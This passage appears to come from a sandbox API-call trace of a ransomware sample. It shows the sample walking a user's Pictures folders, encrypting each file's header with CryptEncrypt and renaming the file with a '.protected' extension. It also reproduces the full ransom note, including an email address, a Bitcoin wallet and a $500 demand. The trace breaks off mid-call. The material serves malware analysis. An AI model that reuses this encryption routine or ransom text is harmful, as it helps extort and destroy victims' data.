(lpString1="GNxOOw1.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.405] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\gnxoow1.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.405] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp") returned 74 [0092.405] StrStrW (lpFirst="GNxOOw1.bmp", lpSrch=".txt") returned 0x0 [0092.405] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp") returned 74 [0092.405] StrStrW (lpFirst="GNxOOw1.bmp", lpSrch=".rar") returned 0x0 [0092.405] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp") returned 74 [0092.406] StrStrW (lpFirst="GNxOOw1.bmp", lpSrch=".zip") returned 0x0 [0092.406] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.406] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.406] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.406] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.406] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.406] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.407] CloseHandle (hObject=0xd4) returned 1 [0092.407] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp.protected") returned 84 [0092.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\gnxoow1.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\gnxoow1.bmp.protected")) returned 1 [0092.408] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.408] lstrcmpiW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="Windows") returned -1 [0092.408] lstrcmpiW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="Program Files") returned 1 [0092.408] lstrcmpiW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="Program Files (x86)") returned 1 [0092.408] lstrcmpiW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="$Recycle.bin") returned 1 [0092.408] lstrcmpiW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="System Volume Information") returned 1 [0092.408] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png") returned 84 [0092.408] StrStrIW (lpFirst="t8oqS4WPdm0-igy_9.png", lpSrch=".protected") returned 0x0 [0092.408] lstrcmpW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="RESTORE_FILES.txt") returned 1 [0092.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\t8oqs4wpdm0-igy_9.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png") returned 84 [0092.408] StrStrW (lpFirst="t8oqS4WPdm0-igy_9.png", lpSrch=".txt") returned 0x0 [0092.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png") returned 84 [0092.408] StrStrW (lpFirst="t8oqS4WPdm0-igy_9.png", lpSrch=".rar") returned 0x0 [0092.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png") returned 84 [0092.408] StrStrW (lpFirst="t8oqS4WPdm0-igy_9.png", lpSrch=".zip") returned 0x0 [0092.409] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.409] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.409] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.410] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.410] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.410] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.410] CloseHandle (hObject=0xd4) returned 1 [0092.410] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png.protected") returned 94 [0092.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\t8oqs4wpdm0-igy_9.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\t8oqs4wpdm0-igy_9.png.protected")) returned 1 [0092.411] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.411] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.411] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\RESTORE_FILES.txt") returned 80 [0092.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.476] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.476] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.476] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.476] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.476] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.476] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0092.476] CloseHandle (hObject=0xb4) returned 1 [0092.477] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.477] lstrcmpiW (lpString1="haXR6MDt6plek1a.png", lpString2="Windows") returned -1 [0092.477] lstrcmpiW (lpString1="haXR6MDt6plek1a.png", lpString2="Program Files") returned -1 [0092.477] lstrcmpiW (lpString1="haXR6MDt6plek1a.png", lpString2="Program Files (x86)") returned -1 [0092.477] lstrcmpiW (lpString1="haXR6MDt6plek1a.png", lpString2="$Recycle.bin") returned 1 [0092.477] lstrcmpiW (lpString1="haXR6MDt6plek1a.png", lpString2="System Volume Information") returned -1 [0092.477] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png") returned 62 [0092.477] StrStrIW (lpFirst="haXR6MDt6plek1a.png", lpSrch=".protected") returned 0x0 [0092.477] lstrcmpW (lpString1="haXR6MDt6plek1a.png", lpString2="RESTORE_FILES.txt") returned -1 [0092.477] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.477] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\haxr6mdt6plek1a.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.478] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png") returned 62 [0092.478] StrStrW (lpFirst="haXR6MDt6plek1a.png", lpSrch=".txt") returned 0x0 [0092.478] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png") returned 62 [0092.478] StrStrW (lpFirst="haXR6MDt6plek1a.png", lpSrch=".rar") returned 0x0 [0092.478] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png") returned 62 [0092.478] StrStrW (lpFirst="haXR6MDt6plek1a.png", lpSrch=".zip") returned 0x0 [0092.478] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.479] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.479] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.479] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.479] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.480] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.480] CloseHandle (hObject=0xb4) returned 1 [0092.480] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png.protected") returned 72 [0092.480] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\haxr6mdt6plek1a.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\haXR6MDt6plek1a.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\haxr6mdt6plek1a.png.protected")) returned 1 [0092.482] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.482] lstrcmpiW (lpString1="o s0", lpString2="Windows") returned -1 [0092.482] lstrcmpiW (lpString1="o s0", lpString2="Program Files") returned -1 [0092.482] lstrcmpiW (lpString1="o s0", lpString2="Program Files (x86)") returned -1 [0092.482] lstrcmpiW (lpString1="o s0", lpString2="$Recycle.bin") returned 1 [0092.482] lstrcmpiW (lpString1="o s0", lpString2="System Volume Information") returned -1 [0092.482] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0") returned 47 [0092.482] lstrcmpW (lpString1="o s0", lpString2=".") returned 1 [0092.482] lstrcmpW (lpString1="o s0", lpString2="..") returned 1 [0092.482] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\*") returned 49 [0092.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.482] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.482] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.482] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.482] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.482] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.482] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\.") returned 49 [0092.482] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.482] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.482] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.482] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.482] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.482] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.482] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.482] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\..") returned 50 [0092.482] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.482] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.482] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.482] lstrcmpiW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="Windows") returned -1 [0092.482] lstrcmpiW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="Program Files") returned -1 [0092.483] lstrcmpiW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="Program Files (x86)") returned -1 [0092.483] lstrcmpiW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="$Recycle.bin") returned 1 [0092.483] lstrcmpiW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="System Volume Information") returned -1 [0092.483] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu") returned 67 [0092.483] lstrcmpW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2=".") returned 1 [0092.483] lstrcmpW (lpString1="2VqH2V9xe6lVG09j5Nu", lpString2="..") returned 1 [0092.483] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\*") returned 69 [0092.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.483] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.483] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.483] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.483] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.483] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.483] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\.") returned 69 [0092.483] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.483] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.483] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.483] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.483] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.483] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.483] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.483] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\..") returned 70 [0092.484] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.484] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.484] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.484] lstrcmpiW (lpString1="9Qlywkuw.jpg", lpString2="Windows") returned -1 [0092.484] lstrcmpiW (lpString1="9Qlywkuw.jpg", lpString2="Program Files") returned -1 [0092.484] lstrcmpiW (lpString1="9Qlywkuw.jpg", lpString2="Program Files (x86)") returned -1 [0092.484] lstrcmpiW (lpString1="9Qlywkuw.jpg", lpString2="$Recycle.bin") returned 1 [0092.484] lstrcmpiW (lpString1="9Qlywkuw.jpg", lpString2="System Volume Information") returned -1 [0092.484] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg") returned 80 [0092.484] StrStrIW (lpFirst="9Qlywkuw.jpg", lpSrch=".protected") returned 0x0 [0092.484] lstrcmpW (lpString1="9Qlywkuw.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0092.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\9qlywkuw.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg") returned 80 [0092.484] StrStrW (lpFirst="9Qlywkuw.jpg", lpSrch=".txt") returned 0x0 [0092.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg") returned 80 [0092.484] StrStrW (lpFirst="9Qlywkuw.jpg", lpSrch=".rar") returned 0x0 [0092.485] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg") returned 80 [0092.485] StrStrW (lpFirst="9Qlywkuw.jpg", lpSrch=".zip") returned 0x0 [0092.485] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.485] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.485] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.485] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, 